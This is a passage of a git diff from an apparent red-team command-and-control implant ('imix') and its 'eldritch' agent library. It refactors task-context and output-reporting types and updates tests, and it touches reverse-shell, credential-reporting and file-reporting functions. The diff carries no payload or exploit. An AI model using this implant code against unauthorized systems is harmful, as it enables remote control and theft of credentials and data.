Some(reverse_shell_request::Context::ShellTaskContext( + stc.clone(), + )), + }; + match self.tx.blocking_send(ReverseShellRequest { - context: Some(self.task_context.clone()), + context: context_val, kind: ReverseShellMessageKind::Ping.into(), data: Vec::new(), }) { diff --git a/implants/imix/src/task.rs b/implants/imix/src/task.rs index 3705a50be..91facbaa6 100644 --- a/implants/imix/src/task.rs +++ b/implants/imix/src/task.rs @@ -6,7 +6,11 @@ use std::time::SystemTime; use eldritch::agent::agent::Agent; use eldritch::assets::std::EmbeddedAssets; use eldritch::{Interpreter, Value, conversion::ToValue}; -use pb::c2::{ReportTaskOutputRequest, Task, TaskContext, TaskError, TaskOutput}; +use eldritch_agent::Context; +use pb::c2::{ + ReportOutputRequest, ReportTaskOutputMessage, Task, TaskContext, TaskError, TaskOutput, + report_output_request, +}; use prost_types::Timestamp; use tokio::sync::mpsc; @@ -45,6 +49,7 @@ impl TaskRegistry { task_id: task.clone().id, jwt: task.clone().jwt, }; + let context = Context::Task(task_context.clone()); // 1. Register logic // TODO: Should de-dupe Tasks and TaskContext? @@ -62,7 +67,7 @@ impl TaskRegistry { thread::spawn(move || { if let Some(tome) = task.tome { - execute_task(task_context.clone(), tome, agent, runtime_handle); + execute_task(context, tome, agent, runtime_handle); } else { #[cfg(debug_assertions)] log::warn!("Task {0} has no tome", task_context.clone().task_id); @@ -140,7 +145,7 @@ impl TaskRegistry { } fn execute_task( - task_context: TaskContext, + context: Context, tome: pb::eldritch::Tome, agent: Arc, runtime_handle: tokio::runtime::Handle, @@ -149,14 +154,19 @@ fn execute_task( let (tx, rx) = mpsc::unbounded_channel(); let (error_tx, error_rx) = mpsc::unbounded_channel(); let printer = Arc::new(StreamPrinter::new(tx, error_tx)); - let mut interp = setup_interpreter(task_context.clone(), &tome, agent.clone(), printer.clone()); + let mut interp = setup_interpreter(context.clone(), &tome, agent.clone(), printer.clone()); + + let task_id = match &context { + Context::Task(tc) => tc.task_id, + _ => 0, + }; // Report Start - report_start(task_context.clone(), &agent); + report_start(context.clone(), &agent); // Spawn output consumer task let consumer_join_handle = spawn_output_consumer( - task_context.clone(), + context.clone(), agent.clone(), runtime_handle.clone(), rx, @@ -179,22 +189,22 @@ fn execute_task( #[cfg(debug_assertions)] log::error!( "task={0} failed to wait for output consumer to join: {_e}", - task_context.clone().task_id + task_id ); } } // Handle result match result { - Ok(exec_result) => report_result(task_context, exec_result, &agent), + Ok(exec_result) => report_result(context, exec_result, &agent), Err(e) => { - report_panic(task_context, &agent, format!("panic: {e:?}")); + report_panic(context, &agent, format!("panic: {e:?}")); } } } fn setup_interpreter( - task_context: TaskContext, + context: Context, tome: &pb::eldritch::Tome, agent: Arc, printer: Arc, @@ -206,7 +216,7 @@ fn setup_interpreter( // Support embedded assets behind remote asset filenames let backend = Arc::new(EmbeddedAssets::::new()); // Register Task Context (Agent, Report, Assets) - interp = interp.with_task_context(agent, task_context, remote_assets, backend); + interp = interp.with_context(agent, context, remote_assets, backend); // Inject input_params let params_map: BTreeMap = tome @@ -220,21 +230,28 @@ fn setup_interpreter( interp } -fn report_start(task_context: TaskContext, agent: &Arc) { - let task_id = task_context.task_id; +fn report_start(context: Context, agent: &Arc) { + let (task_id, task_context) = match context { + Context::Task(tc) => (tc.task_id, tc), + _ => return, // Only reporting for TaskContext + }; + #[cfg(debug_assertions)] log::info!("task={task_id} Started execution"); - match agent.report_task_output(ReportTaskOutputRequest { - output: Some(TaskOutput { - id: task_id, - output: String::new(), - error: None, - exec_started_at: Some(Timestamp::from(SystemTime::now())), - exec_finished_at: None, - }), - context: Some(task_context.into()), - shell_task_output: None, + match agent.report_output(ReportOutputRequest { + message: Some(report_output_request::Message::TaskOutput( + ReportTaskOutputMessage { + context: Some(task_context.clone()), + output: Some(TaskOutput { + id: task_id, + output: String::new(), + error: None, + exec_started_at: Some(Timestamp::from(SystemTime::now())), + exec_finished_at: None, + }), + }, + )), }) { Ok(_) => {} Err(_e) => { @@ -245,16 +262,20 @@ fn report_start(task_context: TaskContext, agent: &Arc) { } fn spawn_output_consumer( - task_context: TaskContext, + context: Context, agent: Arc, runtime_handle: tokio::runtime::Handle, mut rx: mpsc::UnboundedReceiver, mut error_rx: mpsc::UnboundedReceiver, ) -> tokio::task::JoinHandle<()> { runtime_handle.spawn(async move { + let (task_id, task_context) = match context { + Context::Task(tc) => (tc.task_id, tc), + _ => return, // Only reporting for TaskContext + }; + #[cfg(debug_assertions)] - log::info!("task={} Started output stream", task_context.task_id); - let task_id = task_context.task_id; + log::info!("task={} Started output stream", task_id); let mut rx_open = true; let mut error_rx_open = true; @@ -263,16 +284,19 @@ fn spawn_output_consumer( val = rx.recv(), if rx_open => { match val { Some(msg) => { - match agent.report_task_output(ReportTaskOutputRequest { - output: Some(TaskOutput { - id: task_id, - output: msg, - error: None, - exec_started_at: None, - exec_finished_at: None, - }), - context: Some(task_context.clone().into()), - shell_task_output: None, + match agent.report_output(ReportOutputRequest { + message: Some(report_output_request::Message::TaskOutput( + ReportTaskOutputMessage { + context: Some(task_context.clone()), + output: Some(TaskOutput { + id: task_id, + output: msg, + error: None, + exec_started_at: None, + exec_finished_at: None, + }), + }, + )), }) { Ok(_) => {} Err(_e) => { @@ -289,16 +313,19 @@ fn spawn_output_consumer( val = error_rx.recv(), if error_rx_open => { match val { Some(msg) => { - match agent.report_task_output(ReportTaskOutputRequest { - output: Some(TaskOutput { - id: task_id, - output: String::new(), - error: Some(TaskError { msg }), - exec_started_at: None, - exec_finished_at: None, - }), - context: Some(task_context.clone().into()), - shell_task_output: None, + match agent.report_output(ReportOutputRequest { + message: Some(report_output_request::Message::TaskOutput( + ReportTaskOutputMessage { + context: Some(task_context.clone()), + output: Some(TaskOutput { + id: task_id, + output: String::new(), + error: Some(TaskError { msg }), + exec_started_at: None, + exec_finished_at: None, + }), + }, + )), }) { Ok(_) => {} Err(_e) => { @@ -321,18 +348,25 @@ fn spawn_output_consumer( }) } -fn report_panic(task_context: TaskContext, agent: &Arc, err: String) { - let task_id = task_context.task_id; - match agent.report_task_output(ReportTaskOutputRequest { - output: Some(TaskOutput { - id: task_id, - output: String::new(), - error: Some(TaskError { msg: err }), - exec_started_at: None, - exec_finished_at: Some(Timestamp::from(SystemTime::now())), - }), - context: Some(task_context.into()), - shell_task_output: None, +fn report_panic(context: Context, agent: &Arc, err: String) { + let (task_id, task_context) = match context { + Context::Task(tc) => (tc.task_id, tc), + _ => return, // Only reporting for TaskContext + }; + + match agent.report_output(ReportOutputRequest { + message: Some(report_output_request::Message::TaskOutput( + ReportTaskOutputMessage { + context: Some(task_context.clone()), + output: Some(TaskOutput { + id: task_id, + output: String::new(), + error: Some(TaskError { msg: err }), + exec_started_at: None, + exec_finished_at: Some(Timestamp::from(SystemTime::now())), + }), + }, + )), }) { Ok(_) => {} Err(_e) => { @@ -342,39 +376,49 @@ fn report_panic(task_context: TaskContext, agent: &Arc, err: String) } } -fn report_result(task_context: TaskContext, result: Result, agent: &Arc) { - let task_id = task_context.task_id; +fn report_result(context: Context, result: Result, agent: &Arc) { + let (task_id, task_context) = match context { + Context::Task(tc) => (tc.task_id, tc), + _ => return, // Only reporting for TaskContext + }; + match result { Ok(v) => { #[cfg(debug_assertions)] log::info!("task={task_id} Success: {v}"); - let _ = agent.report_task_output(ReportTaskOutputRequest { - output: Some(TaskOutput { - id: task_id, - output: String::new(), - error: None, - exec_started_at: None, - exec_finished_at: Some(Timestamp::from(SystemTime::now())), - }), - context: Some(task_context.into()), - shell_task_output: None, + let _ = agent.report_output(ReportOutputRequest { + message: Some(report_output_request::Message::TaskOutput( + ReportTaskOutputMessage { + context: Some(task_context.clone()), + output: Some(TaskOutput { + id: task_id, + output: String::new(), + error: None, + exec_started_at: None, + exec_finished_at: Some(Timestamp::from(SystemTime::now())), + }), + }, + )), }); } Err(e) => { #[cfg(debug_assertions)] log::info!("task={task_id} Error: {e}"); - match agent.report_task_output(ReportTaskOutputRequest { - output: Some(TaskOutput { - id: task_id, - output: String::new(), - error: Some(TaskError { msg: e }), - exec_started_at: None, - exec_finished_at: Some(Timestamp::from(SystemTime::now())), - }), - context: Some(task_context.into()), - shell_task_output: None, + match agent.report_output(ReportOutputRequest { + message: Some(report_output_request::Message::TaskOutput( + ReportTaskOutputMessage { + context: Some(task_context.clone()), + output: Some(TaskOutput { + id: task_id, + output: String::new(), + error: Some(TaskError { msg: e }), + exec_started_at: None, + exec_finished_at: Some(Timestamp::from(SystemTime::now())), + }), + }, + )), }) { Ok(_) => {} Err(_e) => { diff --git a/implants/imix/src/tests/agent_output_aggregation.rs b/implants/imix/src/tests/agent_output_aggregation.rs index b1246099e..d8e7773ef 100644 --- a/implants/imix/src/tests/agent_output_aggregation.rs +++ b/implants/imix/src/tests/agent_output_aggregation.rs @@ -1,6 +1,9 @@ use crate::agent::ImixAgent; use crate::task::TaskRegistry; -use pb::c2::{ReportTaskOutputRequest, ShellTaskOutput, TaskContext, TaskOutput}; +use pb::c2::{ + ReportOutputRequest, ReportShellTaskOutputMessage, ReportTaskOutputMessage, ShellTaskContext, + ShellTaskOutput, TaskContext, TaskOutput, report_output_request, +}; use pb::config::Config; use std::sync::{Arc, Mutex}; use transport::MockTransport; @@ -19,49 +22,14 @@ async fn test_agent_output_aggregation() { // 2. Shell Task 500 // 3. Shell Task 600 transport - .expect_report_task_output() + .expect_report_output() .times(3) .returning(move |req| { requests_clone.lock().unwrap().push(req); - Ok(pb::c2::ReportTaskOutputResponse {}) + Ok(pb::c2::ReportOutputResponse {}) }); transport.expect_is_active().returning(|| true); - // clone() needs to be mocked if it's called. - // ImixAgent uses T: Transport + Sync + 'static. - // It stores Arc>. It doesn't clone the transport unless get_usable_transport calls clone. - // But get_usable_transport calls `guard.clone()`. - // So we need to mock clone. - transport.expect_clone().returning(|| { - let mut t = MockTransport::default(); - // This is tricky. If we return a NEW mock, the expectations won't be on it. - // But if `MockTransport` supports sharing expectations via clone, we don't need to mock clone? - // Wait, the `mock!` block had `impl Clone for Transport`. - // If I mock `clone` explicitly, I am overriding the default behavior. - // But `Transport` trait requires `Clone` (in ImixAgent bounds? No, T: Transport. Transport trait requires Clone? - // Let's check `implants/lib/transport/src/lib.rs`. - // `pub trait Transport: Clone + Send + Sync + 'static`? No. - // `implants/lib/transport/src/transport.rs` likely defines the trait. - t - }); - - // Actually, looking at `agent.rs`: - // `impl ImixAgent` - // It calls `guard.clone()` in `get_usable_transport`. - // So `T` must be `Clone`. - // `mock!` macro implements `Clone` for the struct. - // If I add `expect_clone`, I might be interfering. - // Let's try WITHOUT expecting clone first. If `MockTransport` implements Clone logic that preserves expectations, it's fine. - // But wait, `MockTransport` is generated by `mock!`. - // If `mock!` defines `impl Clone`, then calling `clone()` calls that implementation. - // That implementation usually returns a new handle to the same mock state. - // However, `ImixAgent` stores `T`. - // When `flush_outputs` runs: - // `let mut transport = self.transport.write().await;` - // `transport.report_task_output(output).await` - // It uses the stored transport directly. It does NOT clone it. - // `get_usable_transport` is NOT called in `flush_outputs`. - // So I don't need to worry about `clone` for `flush_outputs`. // 2. Setup Agent let handle = tokio::runtime::Handle::current(); @@ -78,76 +46,100 @@ async fn test_agent_output_aggregation() { // 3. Send outputs // Task Output (Task ID 100) - let task_out_1 = ReportTaskOutputRequest { - context: Some(TaskContext { - task_id: 100, - jwt: "jwt".into(), - }), - output: Some(TaskOutput { - id: 100, - output: "Part 1".into(), - error: None, - exec_started_at: None, - exec_finished_at: None, - }), - shell_task_output: None, + let task_out_1 = ReportOutputRequest { + message: Some(report_output_request::Message::TaskOutput( + ReportTaskOutputMessage { + context: Some(TaskContext { + task_id: 100, + jwt: "jwt".into(), + }), + output: Some(TaskOutput { + id: 100, + output: "Part 1".into(), + error: None, + exec_started_at: None, + exec_finished_at: None, + }), + }, + )), }; agent.output_tx.send(task_out_1).unwrap(); - let task_out_2 = ReportTaskOutputRequest { - context: Some(TaskContext { - task_id: 100, - jwt: "jwt".into(), - }), - output: Some(TaskOutput { - id: 100, - output: " Part 2".into(), - error: None, - exec_started_at: None, - exec_finished_at: None, - }), - shell_task_output: None, + let task_out_2 = ReportOutputRequest { + message: Some(report_output_request::Message::TaskOutput( + ReportTaskOutputMessage { + context: Some(TaskContext { + task_id: 100, + jwt: "jwt".into(), + }), + output: Some(TaskOutput { + id: 100, + output: " Part 2".into(), + error: None, + exec_started_at: None, + exec_finished_at: None, + }), + }, + )), }; agent.output_tx.send(task_out_2).unwrap(); // Shell Task Output (Shell Task ID 500) - let shell_out_1 = ReportTaskOutputRequest { - context: None, - output: None, - shell_task_output: Some(ShellTaskOutput { - id: 500, - output: "Shell 1".into(), - error: None, - exec_started_at: None, - exec_finished_at: None, - }), + let shell_out_1 = ReportOutputRequest { + message: Some(report_output_request::Message::ShellTaskOutput( + ReportShellTaskOutputMessage { + context: Some(ShellTaskContext { + shell_task_id: 500, + jwt: "jwt".into(), + }), + output: Some(ShellTaskOutput { + id: 500, + output: "Shell 1".into(), + error: None, + exec_started_at: None, + exec_finished_at: None, + }), + }, + )), }; agent.output_tx.send(shell_out_1).unwrap(); - let shell_out_2 = ReportTaskOutputRequest { - context: None, - output: None, - shell_task_output: Some(ShellTaskOutput { - id: 500, - output: " continued".into(), - error: None, - exec_started_at: None, - exec_finished_at: None, - }), + let shell_out_2 = ReportOutputRequest { + message: Some(report_output_request::Message::ShellTaskOutput( + ReportShellTaskOutputMessage { + context: Some(ShellTaskContext { + shell_task_id: 500, + jwt: "jwt".into(), + }), + output: Some(ShellTaskOutput { + id: 500, + output: " continued".into(), + error: None, + exec_started_at: None, + exec_finished_at: None, + }), + }, + )), }; agent.output_tx.send(shell_out_2).unwrap(); // Another Shell Task Output (Shell Task ID 600) - let shell_out_3 = ReportTaskOutputRequest { - context: None, - output: None, - shell_task_output: Some(ShellTaskOutput { - id: 600, - output: "Shell 2".into(), - error: None, - exec_started_at: None, - exec_finished_at: None, - }), + let shell_out_3 = ReportOutputRequest { + message: Some(report_output_request::Message::ShellTaskOutput( + ReportShellTaskOutputMessage { + context: Some(ShellTaskContext { + shell_task_id: 600, + jwt: "jwt".into(), + }), + output: Some(ShellTaskOutput { + id: 600, + output: "Shell 2".into(), + error: None, + exec_started_at: None, + exec_finished_at: None, + }), + }, + )), }; agent.output_tx.send(shell_out_3).unwrap(); @@ -161,34 +153,54 @@ async fn test_agent_output_aggregation() { // Check Task 100 let task_100 = reqs .iter() - .find(|r| r.context.as_ref().map(|c| c.task_id) == Some(100)) + .find(|r| match &r.message { + Some(report_output_request::Message::TaskOutput(m)) => { + m.context.as_ref().map(|c| c.task_id) == Some(100) + } + _ => false, + }) .expect("Task 100 output missing"); - assert_eq!(task_100.output.as_ref().unwrap().output, "Part 1 Part 2"); - assert!(task_100.shell_task_output.is_none()); + match &task_100.message { + Some(report_output_request::Message::TaskOutput(m)) => { + assert_eq!(m.output.as_ref().unwrap().output, "Part 1 Part 2"); + } + _ => panic!("Expected TaskOutput"), + } // Check Shell 500 let shell_500 = reqs .iter() - .find(|r| r.shell_task_output.as_ref().map(|s| s.id) == Some(500)) + .find(|r| match &r.message { + Some(report_output_request::Message::ShellTaskOutput(m)) => { + m.context.as_ref().map(|c| c.shell_task_id) == Some(500) + } + _ => false, + }) .expect("Shell 500 output missing"); - assert_eq!( - shell_500.shell_task_output.as_ref().unwrap().output, - "Shell 1 continued" - ); - assert!(shell_500.output.is_none()); - assert!(shell_500.context.is_none()); + match &shell_500.message { + Some(report_output_request::Message::ShellTaskOutput(m)) => { + assert_eq!(m.output.as_ref().unwrap().output, "Shell 1 continued"); + } + _ => panic!("Expected ShellTaskOutput"), + } // Check Shell 600 let shell_600 = reqs .iter() - .find(|r| r.shell_task_output.as_ref().map(|s| s.id) == Some(600)) + .find(|r| match &r.message { + Some(report_output_request::Message::ShellTaskOutput(m)) => { + m.context.as_ref().map(|c| c.shell_task_id) == Some(600) + } + _ => false, + }) .expect("Shell 600 output missing"); - assert_eq!( - shell_600.shell_task_output.as_ref().unwrap().output, - "Shell 2" - ); - assert!(shell_600.output.is_none()); + match &shell_600.message { + Some(report_output_request::Message::ShellTaskOutput(m)) => { + assert_eq!(m.output.as_ref().unwrap().output, "Shell 2"); + } + _ => panic!("Expected ShellTaskOutput"), + } } diff --git a/implants/imix/src/tests/agent_tests.rs b/implants/imix/src/tests/agent_tests.rs index 38ea9a504..e44255797 100644 --- a/implants/imix/src/tests/agent_tests.rs +++ b/implants/imix/src/tests/agent_tests.rs @@ -40,10 +40,10 @@ async fn test_start_reverse_shell() { let agent_clone = agent.clone(); let result = std::thread::spawn(move || { agent_clone.start_reverse_shell( - pb::c2::TaskContext { + eldritch_agent::Context::Task(pb::c2::TaskContext { task_id: 12345, jwt: "some jwt".to_string(), - }, + }), Some("echo test".to_string()), ) }) diff --git a/implants/imix/src/tests/agent_trait_tests.rs b/implants/imix/src/tests/agent_trait_tests.rs index 067aa8d43..5cfcb9a82 100644 --- a/implants/imix/src/tests/agent_trait_tests.rs +++ b/implants/imix/src/tests/agent_trait_tests.rs @@ -2,7 +2,7 @@ use super::super::agent::ImixAgent; use super::super::task::TaskRegistry; use eldritch::agent::agent::Agent; use pb::c2::host::Platform; -use pb::c2::{self, Host}; +use pb::c2::{self, Host, report_file_request, report_output_request}; use pb::config::Config; use std::sync::Arc; use transport::MockTransport; @@ -11,11 +11,11 @@ use transport::MockTransport; async fn test_imix_agent_buffer_and_flush() { let mut transport = MockTransport::default(); - // We expect report_task_output to be called exactly once + // We expect report_output to be called exactly once transport - .expect_report_task_output() + .expect_report_output() .times(1) - .returning(|_| Ok(c2::ReportTaskOutputResponse {})); + .returning(|_| Ok(c2::ReportOutputResponse {})); transport.expect_is_active().returning(|| true); @@ -25,19 +25,22 @@ async fn test_imix_agent_buffer_and_flush() { let agent = ImixAgent::new(Config::default(), transport, handle, registry, tx); // 1. Report output (should buffer) - let req = c2::ReportTaskOutputRequest { - output: Some(c2::TaskOutput { - id: 1, - output: "test".to_string(), - ..Default::default() - }), - context: Some(c2::TaskContext { - task_id: 1, - jwt: "some jwt".to_string(), - }), - shell_task_output: None, + let req = c2::ReportOutputRequest { + message: Some(report_output_request::Message::TaskOutput( + c2::ReportTaskOutputMessage { + output: Some(c2::TaskOutput { + id: 1, + output: "test".to_string(), + ..Default::default() + }), + context: Some(c2::TaskContext { + task_id: 1, + jwt: "some jwt".to_string(), + }), + }, + )), }; - agent.report_task_output(req).unwrap(); + agent.report_output(req).unwrap(); // 2. Flush outputs (should drain buffer and call transport) agent.flush_outputs().await; @@ -72,10 +75,12 @@ async fn test_imix_agent_fetch_asset() { let req = c2::FetchAssetRequest { name: "test_file".to_string(), - context: Some(c2::TaskContext { - task_id: 0, - jwt: "a jwt".to_string(), - }), + context: Some(c2::fetch_asset_request::Context::TaskContext( + c2::TaskContext { + task_id: 0, + jwt: "a jwt".to_string(), + }, + )), }; let agent_clone = agent.clone(); @@ -110,10 +115,12 @@ async fn test_imix_agent_report_credential() { std::thread::spawn(move || { let _ = agent_clone.report_credential(c2::ReportCredentialRequest { credential: None, - context: Some(c2::TaskContext { - task_id: 1, - jwt: "some jwt".to_string(), - }), + context: Some(c2::report_credential_request::Context::TaskContext( + c2::TaskContext { + task_id: 1, + jwt: "some jwt".to_string(), + }, + )), }); }) .join() @@ -143,10 +150,12 @@ async fn test_imix_agent_report_process_list() { std::thread::spawn(move || { let _ = agent_clone.report_process_list(c2::ReportProcessListRequest { list: None, - context: Some(c2::TaskContext { - task_id: 1, - jwt: "some jwt".to_string(), - }), + context: Some(c2::report_process_list_request::Context::TaskContext( + c2::TaskContext { + task_id: 1, + jwt: "some jwt".to_string(), + }, + )), }); }) .join() @@ -200,10 +209,11 @@ async fn test_imix_agent_report_file() { std::thread::spawn(move || { let _ = agent_clone.report_file(c2::ReportFileRequest { chunk: None, - context: Some(c2::TaskContext { + context: Some(report_file_request::Context::TaskContext(c2::TaskContext { task_id: 1, jwt: "test jwt".to_string(), - }), + })), + kind: c2::ReportFileKind::Ondisk as i32, }); }) .join() diff --git a/implants/imix/src/tests/task_tests.rs b/implants/imix/src/tests/task_tests.rs index 0bd671978..3b6261408 100644 --- a/implants/imix/src/tests/task_tests.rs +++ b/implants/imix/src/tests/task_tests.rs @@ -1,8 +1,9 @@ use super::super::task::TaskRegistry; use alloc::collections::{BTreeMap, BTreeSet}; use eldritch::agent::agent::Agent; +use eldritch_agent::Context; use pb::c2; -use pb::c2::TaskContext; +use pb::c2::{ReportOutputRequest, report_output_request}; use pb::eldritch::Tome; use std::sync::Arc; use std::sync::Mutex; @@ -10,7 +11,7 @@ use std::time::Duration; // Mock Agent specifically for TaskRegistry struct MockAgent { - output_reports: Arc>>, + output_reports: Arc>>, } impl MockAgent { @@ -40,24 +41,20 @@ impl Agent for MockAgent { ) -> Result { Ok(c2::ReportProcessListResponse {}) } - fn report_task_output( + fn report_output( &self, - req: c2::ReportTaskOutputRequest, - ) -> Result { + req: c2::ReportOutputRequest, + ) -> Result { self.output_reports.lock().unwrap().push(req); - Ok(c2::ReportTaskOutputResponse {}) + Ok(c2::ReportOutputResponse {}) } - fn create_portal(&self, _task_context: TaskContext) -> Result<(), String> { + fn create_portal(&self, _context: Context) -> Result<(), String> { Ok(()) } - fn start_reverse_shell( - &self, - _task_context: TaskContext, - _cmd: Option, - ) -> Result<(), String> { + fn start_reverse_shell(&self, _context: Context, _cmd: Option) -> Result<(), String> { Ok(()) } - fn start_repl_reverse_shell(&self, _task_context: TaskContext) -> Result<(), String> { + fn start_repl_reverse_shell(&self, _context: Context) -> Result<(), String> { Ok(()) } fn claim_tasks(&self, _req: c2::ClaimTasksRequest) -> Result { @@ -135,10 +132,12 @@ async fn test_task_registry_spawn() { // Check for Hello World let has_output = reports.iter().any(|r| { - r.output - .as_ref() - .map(|o| o.output.contains("Hello World")) - .unwrap_or(false) + if let Some(report_output_request::Message::TaskOutput(m)) = &r.message { + if let Some(o) = &m.output { + return o.output.contains("Hello World"); + } + } + false }); assert!( has_output, @@ -147,10 +146,12 @@ async fn test_task_registry_spawn() { // Check completion let has_finished = reports.iter().any(|r| { - r.output - .as_ref() - .map(|o| o.exec_finished_at.is_some()) - .unwrap_or(false) + if let Some(report_output_request::Message::TaskOutput(m)) = &r.message { + if let Some(o) = &m.output { + return o.exec_finished_at.is_some(); + } + } + false }); assert!(has_finished, "Should have marked task as finished"); } @@ -188,7 +189,13 @@ async fn test_task_streaming_output() { let outputs: Vec = reports .iter() - .filter_map(|r| r.output.as_ref().map(|o| o.output.clone())) + .filter_map(|r| { + if let Some(report_output_request::Message::TaskOutput(m)) = &r.message { + m.output.as_ref().map(|o| o.output.clone()) + } else { + None + } + }) .filter(|s| !s.is_empty()) .collect(); @@ -231,7 +238,13 @@ async fn test_task_streaming_error() { let outputs: Vec = reports .iter() - .filter_map(|r| r.output.as_ref().map(|o| o.output.clone())) + .filter_map(|r| { + if let Some(report_output_request::Message::TaskOutput(m)) = &r.message { + m.output.as_ref().map(|o| o.output.clone()) + } else { + None + } + }) .filter(|s| !s.is_empty()) .collect(); @@ -242,10 +255,12 @@ async fn test_task_streaming_error() { // Check for error report let error_report = reports.iter().find(|r| { - r.output - .as_ref() - .map(|o| o.error.is_some()) - .unwrap_or(false) + if let Some(report_output_request::Message::TaskOutput(m)) = &r.message { + if let Some(o) = &m.output { + return o.error.is_some(); + } + } + false }); assert!(error_report.is_some(), "Should report error"); } @@ -303,23 +318,23 @@ async fn test_task_eprint_behavior() { // Check if "This is an error" appears in output or error field let error_in_output = reports.iter().any(|r| { - r.output - .as_ref() - .map(|o| o.output.contains("This is an error")) - .unwrap_or(false) + if let Some(report_output_request::Message::TaskOutput(m)) = &r.message { + if let Some(o) = &m.output { + return o.output.contains("This is an error"); + } + } + false }); let error_in_error = reports.iter().any(|r| { - r.output - .as_ref() - .map(|o| { + if let Some(report_output_request::Message::TaskOutput(m)) = &r.message { + if let Some(o) = &m.output { if let Some(err) = &o.error { - err.msg.contains("This is an error") - } else { - false + return err.msg.contains("This is an error"); } - }) - .unwrap_or(false) + } + } + false }); println!("Error in output: {}", error_in_output); diff --git a/implants/lib/eldritch/eldritch-agent/src/lib.rs b/implants/lib/eldritch/eldritch-agent/src/lib.rs index 54ad4055c..20cd21e72 100644 --- a/implants/lib/eldritch/eldritch-agent/src/lib.rs +++ b/implants/lib/eldritch/eldritch-agent/src/lib.rs @@ -4,7 +4,13 @@ extern crate alloc; use alloc::collections::{BTreeMap, BTreeSet}; use alloc::string::String; use alloc::vec::Vec; -use pb::c2::{self, TaskContext}; +use pb::c2::{self, ShellTaskContext, TaskContext}; + +#[derive(Clone, Debug)] +pub enum Context { + Task(TaskContext), + ShellTask(ShellTaskContext), +} pub trait Agent: Send + Sync { // Interactivity @@ -18,17 +24,13 @@ pub trait Agent: Send + Sync { &self, req: c2::ReportProcessListRequest, ) -> Result; - fn report_task_output( - &self, - req: c2::ReportTaskOutputRequest, - ) -> Result; - fn start_reverse_shell( + fn report_output( &self, - task_context: TaskContext, - cmd: Option, - ) -> Result<(), String>; - fn create_portal(&self, task_context: TaskContext) -> Result<(), String>; - fn start_repl_reverse_shell(&self, task_context: TaskContext) -> Result<(), String>; + req: c2::ReportOutputRequest, + ) -> Result; + fn start_reverse_shell(&self, context: Context, cmd: Option) -> Result<(), String>; + fn create_portal(&self, context: Context) -> Result<(), String>; + fn start_repl_reverse_shell(&self, context: Context) -> Result<(), String>; fn claim_tasks(&self, req: c2::ClaimTasksRequest) -> Result; // Agent Configuration diff --git a/implants/lib/eldritch/eldritch/Cargo.toml b/implants/lib/eldritch/eldritch/Cargo.toml index a6849bfdc..a68976959 100644 --- a/implants/lib/eldritch/eldritch/Cargo.toml +++ b/implants/lib/eldritch/eldritch/Cargo.toml @@ -8,6 +8,7 @@ spin = "0.10" eldritch-core = { workspace = true, default-features = false } eldritch-macros = { workspace = true } +eldritch-agent = { workspace = true } # Libs eldritch-libagent = { workspace = true, default-features = false } diff --git a/implants/lib/eldritch/eldritch/src/lib.rs b/implants/lib/eldritch/eldritch/src/lib.rs index 81986e6ee..66c24becf 100644 --- a/implants/lib/eldritch/eldritch/src/lib.rs +++ b/implants/lib/eldritch/eldritch/src/lib.rs @@ -30,8 +30,9 @@ pub use eldritch_macros as macros; use alloc::string::String; use alloc::sync::Arc; use alloc::vec::Vec; + #[cfg(feature = "stdlib")] -use pb::c2::TaskContext; +use eldritch_agent::Context; #[cfg(feature = "stdlib")] pub use crate::agent::{agent::Agent, std::StdAgentLibrary}; @@ -160,19 +161,21 @@ impl Interpreter { task_id: 0, jwt: String::new(), }; - let agent_lib = StdAgentLibrary::new(agent.clone(), task_context.clone()); + let context = Context::Task(task_context.clone()); + + let agent_lib = StdAgentLibrary::new(agent.clone(), context.clone()); self.inner.register_lib(agent_lib); - let report_lib = StdReportLibrary::new(agent.clone(), task_context.clone()); + let report_lib = StdReportLibrary::new(agent.clone(), context.clone()); self.inner.register_lib(report_lib); - let pivot_lib = StdPivotLibrary::new(agent.clone(), task_context.clone()); + let pivot_lib = StdPivotLibrary::new(agent.clone(), context.clone()); self.inner.register_lib(pivot_lib); // Assets library let backend = Arc::new(crate::assets::std::AgentAssets::new( agent.clone(), - task_context, + context, Vec::new(), )); let mut assets_lib = StdAssetsLibrary::new(); @@ -195,27 +198,27 @@ impl Interpreter { } #[cfg(feature = "stdlib")] - pub fn with_task_context( + pub fn with_context( mut self, agent: Arc, - task_context: TaskContext, + context: Context, remote_assets: Vec, backend: Arc, ) -> Self { - let agent_lib = StdAgentLibrary::new(agent.clone(), task_context.clone()); + let agent_lib = StdAgentLibrary::new(agent.clone(), context.clone()); self.inner.register_lib(agent_lib); - let report_lib = StdReportLibrary::new(agent.clone(), task_context.clone()); + let report_lib = StdReportLibrary::new(agent.clone(), context.clone()); self.inner.register_lib(report_lib); - let pivot_lib = StdPivotLibrary::new(agent.clone(), task_context.clone()); + let pivot_lib = StdPivotLibrary::new(agent.clone(), context.clone()); self.inner.register_lib(pivot_lib); let mut assets_lib = StdAssetsLibrary::new(); // As with previously, remote assets can shadow the Embedded Assets let agent_backend = Arc::new(crate::assets::std::AgentAssets::new( agent.clone(), - task_context, + context, remote_assets.clone(), )); assets_lib.add_shadow(agent_backend.clone()); diff --git a/implants/lib/eldritch/eldritch/src/process_report_test.rs b/implants/lib/eldritch/eldritch/src/process_report_test.rs index c172c6033..4bb1a94b0 100644 --- a/implants/lib/eldritch/eldritch/src/process_report_test.rs +++ b/implants/lib/eldritch/eldritch/src/process_report_test.rs @@ -11,6 +11,8 @@ use alloc::sync::Arc; #[cfg(feature = "stdlib")] use alloc::vec::Vec; #[cfg(feature = "stdlib")] +use eldritch_agent::Context; +#[cfg(feature = "stdlib")] use pb::c2; #[cfg(feature = "stdlib")] use pb::c2::TaskContext; @@ -54,23 +56,19 @@ impl Agent for MockAgent { fn report_file(&self, _req: c2::ReportFileRequest) -> Result { Ok(c2::ReportFileResponse::default()) } - fn report_task_output( + fn report_output( &self, - _req: c2::ReportTaskOutputRequest, - ) -> Result { - Ok(c2::ReportTaskOutputResponse::default()) + _req: c2::ReportOutputRequest, + ) -> Result { + Ok(c2::ReportOutputResponse::default()) } - fn start_reverse_shell( - &self, - _task_context: TaskContext, - _cmd: Option, - ) -> Result<(), String> { + fn start_reverse_shell(&self, _context: Context, _cmd: Option) -> Result<(), String> { Ok(()) } - fn create_portal(&self, _task_context: TaskContext) -> Result<(), String> { + fn create_portal(&self, _context: Context) -> Result<(), String> { Ok(()) } - fn start_repl_reverse_shell(&self, _task_context: TaskContext) -> Result<(), String> { + fn start_repl_reverse_shell(&self, _context: Context) -> Result<(), String> { Ok(()) } fn claim_tasks(&self, _req: 